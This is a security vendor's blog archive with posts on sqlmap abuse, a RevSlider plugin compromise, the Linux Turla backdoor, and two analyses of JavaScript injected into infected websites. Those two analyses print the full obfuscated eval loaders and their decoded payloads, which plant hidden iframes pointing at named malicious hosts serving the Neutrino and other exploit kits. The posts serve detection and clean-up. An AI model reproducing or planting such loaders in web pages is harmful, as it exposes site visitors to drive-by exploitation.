Showing posts with label vulnerability exploits. Show all posts
Showing posts with label vulnerability exploits. Show all posts

Monday, May 30, 2016

SQLMAP.py - A friend or a foe


Security tools serving good and bad 

This is a python script used by Cyber Security Analysts to check for vulnerabilities in website. Like any other network security tool, it is being utilized by many, meaning it was also being utilized by the bad guys a.k.a "hackers". While we were browsing the dark web, we stumbled upon a hacking forum where you need to take an exam before you could join their group. Now, this forum is no new to us as there were a lot of hacking forum scattered over the net. What intrigued us most is their entrance exam. In order for a newcomer to become a member they must need to prove themselves by taking over or defacing ones site.

SQLMAP.py has been used in the forum wildly like this is the default tool to check for anyone's site. The administrator of the forum posts a list of sites that are going to be brutally attacked by the newcomers with the use of this tool. Majority of the sites are using CMS such as WordPress, Joomla, Magento, etc., CMS are, usually, not vulnerable by themselves, they just need to be updated with newest release. Meaning, all outdated sites are very prone to attacks.

Remediation

This is just an opening attack for a newbie hackers, so most likely if we were able to deny them, they will stop in an instant. So what we can do to prevent this? It is always healthy to check your access logs from time to time to check for any malicious or brute force access on your site, If you found one, try to investigate where it was coming from, but if you do not recognize them, you can always block their IP from accessing your site. If you are a developer or you have your own developer you can also put a lexical checker on your site. Thus verifying SQL commands to filter SQL commands sent to your site.

For more information on how to use the tool, please visit the sqlmap.py site @ www.sqlmap.org 

Malware clean-up

If you suspect that your website was infected with malware, Quttera experts are always happy to clean it for you and help to prevent it - Malware Monitoring & Cleanup Plans For Websites

Monday, November 23, 2015

Hacked WordPress Sites To Gain Control Over Entire VPS

"RevSlider" Plugin Vulnerability Used to Access VPS File System


Background

The issue has been discovered during malware clean-up of WordPress installation on private VPS. Additionally, the server hosted around 20 more WP installations. The auto cure procedure came back showing infection left-overs and we switched to manual investigation. This short post is to show how simple and genius some hacks could be. 

Malware investigation 

First checks showed that the VPS was infected via outdated RevSlider installation (3.0.95). Hackers were able upload any arbitrary files to the host. Searching further we found some strange directory (wp-content/plugins/revslider/temp/update_extract/sym). After investigation of this directory we found taht it contained softlink to "/" (VPS root directory). As simple as that. Needless to say, that it provided attackers an access to entire file system on this VPS and hackers actually had access to any file/directory on this VPS and utilized it to infect all other WP installations.

Removing this directory and updating the vulnerable plugin solved the issue.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.

Saturday, December 13, 2014

'Turla' Malware Now Supports Linux

New Sample Of 'Turla' Backdoor - Linux Version

Turla Malware


A new 'Turla' Trojan sample has been discovered that targeting Linux operating systems. The previous 'Turla' Trojan targeted Windows operating system but the newly discovered sample supports Linux operating systems too. 

The malware static linking to all required external libraries which makes it independent from
libraries and their versions installed on the victim machine.
'Turla' is derived from publicly available backdoor cd00r (http://www.phenoelit.org/stuff/cd00r.c) and it doesn't 
require administrator (root) privileges and could be executed by any user.
Once, the 'Turla' Trojan executed, it starts a network sniffer and listen for a specific network packet. Once the packet received 'Turla' activates backdoor functionality. 

The first 'Turla' Trojan sample was discovered in yearly 2012 when it was used to attack government computers and servers.

At the time this post was written, new sample was already detected by almost 50% of major antivirus engines

Monday, May 13, 2013

Website uses JavaScript libraries which are located on remote hacked server and containing JS exploit

This summary is not available. Please click here to view the post.

Website infected with malicious iframe leading to Neutrino exploit


Malicious JavaScript injects hidden iframe leading to Neutrino exploit

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

Hidden malicious iframe redirects browser to URL hosting Neutrino exploit. This exploit kit is relatively new and targets at least two Java vulnerabilities CVE-2013-0431 and CVE-2012-1723. The snapshots of the advertising can be seen in malware don't need Coffee post.
Just some of the features this service offers:

1. Plugin's detector
2. On-going check vs major AV vendors to avoid detection of the main code parts
3. User friendly control panel allows Flow Control, Rotation managing, Exploit selection and e.t.c...
4. Transferring the .exe to the client in the encrypted form.

This particular infected website hosts suspicious JavaScript code injected in 2 files and the breakdown of the detection is provided below.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sun May 12 11:59:41 2013
Infected website's files: 2
Website malware scan report link: http://goo.gl/g8WyK



Quttera | Website Malware Scanner
Quttera | Website Security Scan report




Sitescan report | malicious JavaScript in 2 web pages



Threat dump: [[<script type='text/javascript' language='javascript' >
e=eval;
v="0"+"x";
a=0;
z="y";
try
{
a*=2
}
catch(q)
{
a=1
}
if(!a)
{
try
{
document["\x62od"+z]++
}
catch(q)
{
a2="_"
}
z="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
za="";
for(i=0;
i<z.length;
i++)
{
za+=String["fromCharCode"](e(v+(z[i]))-4-3);
}
zaz=za;
e(zaz);
}

 </script>]]



Malware entry


Malware entry details.

Beautified script



  1. e = eval;
  2. v = "0" + "x";
  3. a = 0;
  4. z = "y";
  5. try {
  6.     a *= 2
  7. } catch (q) {
  8.     a = 1
  9. }
  10. if (!a) {
  11.     try {
  12.         document["\x62od" + z]++
  13.     } catch (q) {
  14.         a2 = "_"
  15.     }
  16.     z ="10_10_70_6d_27_2f_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_30_82_14_10_10_10_70_6d_79_68_74_6c_79_2f_30_42_14_10_10_84_27_6c_73_7a_6c_27_82_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_29_43_70_6d_79_68_74_6c_27_7a_79_6a_44_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_27_7e_70_6b_7b_6f_44_2e_38_37_37_2e_27_6f_6c_70_6e_6f_7b_44_2e_38_37_37_2e_27_7a_7b_80_73_6c_44_2e_7e_70_6b_7b_6f_41_38_37_37_77_7f_42_6f_6c_70_6e_6f_7b_41_38_37_37_77_7f_42_77_76_7a_70_7b_70_76_75_41_68_69_7a_76_73_7c_7b_6c_42_73_6c_6d_7b_41_34_38_37_37_37_37_77_7f_42_7b_76_77_41_37_42_2e_45_43_36_70_6d_79_68_74_6c_45_29_30_42_14_10_10_84_14_10_10_6d_7c_75_6a_7b_70_76_75_27_70_6d_79_68_74_6c_79_2f_30_82_14_10_10_10_7d_68_79_27_6d_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7a_79_6a_2e_33_2e_6f_7b_7b_77_41_36_36_79_7c_73_73_6c_79_7a_7b_7c_69_6c_7a_35_75_6c_7b_36_73_70_69_80_6b_70_71_6a_7d_71_6c_46_6d_6a_69_72_6f_74_6b_6c_7b_7e_7f_7c_44_3c_38_3f_3d_3e_3c_38_2e_30_42_6d_35_7a_7b_80_73_6c_35_73_6c_6d_7b_44_2e_34_38_37_37_37_37_77_7f_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_44_2e_68_69_7a_76_73_7c_7b_6c_2e_42_6d_35_7a_7b_80_73_6c_35_7b_76_77_44_2e_37_2e_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_7e_70_6b_7b_6f_2e_33_2e_38_37_37_2e_30_42_6d_35_7a_6c_7b_48_7b_7b_79_70_69_7c_7b_6c_2f_2e_6f_6c_70_6e_6f_7b_2e_33_2e_38_37_37_2e_30_42_14_10_10_10_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_7a_49_80_5b_68_6e_55_68_74_6c_2f_2e_69_76_6b_80_2e_30_62_37_64_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_6d_30_42_14_10_10_84"["split"](a2);
  17.     za = "";
  18.     for (i = 0; i < z.length; i++) {
  19.         za += String["fromCharCode"](e(v + (z[i])) - 4 - 3);
  20.     }
  21.     zaz = za;
  22.     e(zaz);



Malicious payload


Decoded payload injects hidden iframe to http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751 which leads to Neutrino exploit

  1. if (document.getElementsByTagName('body')[0]) {
  2.     iframer();
  3. } else {
  4.     document.write("<iframe src='http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751' width='100' height='100' style='width:100px;height:100px;position:absolute;left:-10000px;top:0;'></iframe>");
  5. }
  6. function iframer() {
  7.     var f = document.createElement('iframe');
  8.     f.setAttribute('src', 'http://rullerstubes.net/libydijcvje?fcbkhmdetwxu=5186751');
  9.     f.style.left = '-10000px';
  10.     f.style.top = '0';
  11.     f.style.position = 'absolute';
  12.     f.style.top = '0';
  13.     f.setAttribute('width', '100');
  14.     f.setAttribute('height', '100');
  15.     document.getElementsByTagName('body')[0].appendChild(f);
  16. }


Blacklisting status


The website is Suspicious on Google Safe Browsing.




Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.

Sunday, April 28, 2013

Hidden iframe to malicious URL hosting vulnerability exploits


Obfuscated malicious JavaScript code generates hidden iframe which loads vulnerability exploits from malicious URL

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in 61 files. As discussed in other posts about malicious iframes generation, the attack flow is very similar and contains multiple levels of obfuscation to overcome the detection mechanisms. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Sun Apr 28 13:48:44 2013
Infected website's files: 61
Website malware scan report link: http://goo.gl/V7ELN


Quttera | Online Website Malware Scanner
Quttera | Online Website Malware Scanner



Malicious JavaScript injection detected by Online Website Malware Scanner
Malicious JavaScript injection detected in 61 web pages



Malware entry


Malware entry details.

Beautified script


  1. e = eval;
  2. v = "0x";
  3. a = 0;
  4. try {
  5.     a &= 2
  6. } catch (q) {
  7.     a = 1
  8. }
  9. if (!a) {
  10.     try {
  11.         document["body"] ^= ~1;
  12.     } catch (q) {
  13.         a2 = "_"
  14.     }
  15.     z ="2f_6d_7c_75_6a_7b_70_76_75_27_2f_30_27_82_14_11_27_27_27_27_7d_68_79_27_68_7a_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_27_27_27_68_7a_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_71_70_6a_76_6b_7f_6c_6b_35_79_7c_36_6a_76_7c_75_7b_38_3e_35_77_6f_77_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_77_76_7a_70_7b_70_76_75_27_44_27_2e_68_69_7a_76_73_7c_7b_6c_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_69_76_79_6b_6c_79_27_44_27_2e_37_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_6f_6c_70_6e_6f_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_7e_70_6b_7b_6f_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_73_6c_6d_7b_27_44_27_2e_38_77_7f_2e_42_14_11_27_27_27_27_68_7a_35_7a_7b_80_73_6c_35_7b_76_77_27_44_27_2e_38_77_7f_2e_42_14_11_14_11_27_27_27_27_70_6d_27_2f_28_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_68_7a_2e_30_30_27_82_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_7e_79_70_7b_6c_2f_2e_43_6b_70_7d_27_70_6b_44_63_2e_68_7a_63_2e_45_43_36_6b_70_7d_45_2e_30_42_14_11_27_27_27_27_27_27_27_27_6b_76_6a_7c_74_6c_75_7b_35_6e_6c_7b_4c_73_6c_74_6c_75_7b_49_80_50_6b_2f_2e_68_7a_2e_30_35_68_77_77_6c_75_6b_4a_6f_70_73_6b_2f_68_7a_30_42_14_11_27_27_27_27_84_14_11_84_30_2f_30_42"["split"](a2);
  16.     s = "";
  17.     for (i = 0; i < z.length; i++) {
  18.         s += String["fromCharCode"](e(v + (z[i])) - 7);
  19.     }
  20.     zaz = s;
  21.     e(zaz);
  22. }


Malicious payload


Decoded payload injects hidden iframe to http://jicodxed.ru/count17.php 


  1. (function () {
  2.     var as = document.createElement('iframe');
  3.     as.src = 'http://jicodxed.ru/count17.php';
  4.     as.style.position = 'absolute';
  5.     as.style.border = '0';
  6.     as.style.height = '1px';
  7.     as.style.width = '1px';
  8.     as.style.left = '1px';
  9.     as.style.top = '1px';
  10.     if (!document.getElementById('as')) {
  11.         document.write('<div id=\'as\'></div>');
  12.         document.getElementById('as').appendChild(as);
  13.     }
  14. })();



Blacklisting status


The website is Suspicious on Google Safe Browsing. That's not always the case, like we already posted, for other websites compromised in the similar way, when only one vendor detected the malware.



Google Safe Browsing analysis


Malicious software includes 15 exploit(s).

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.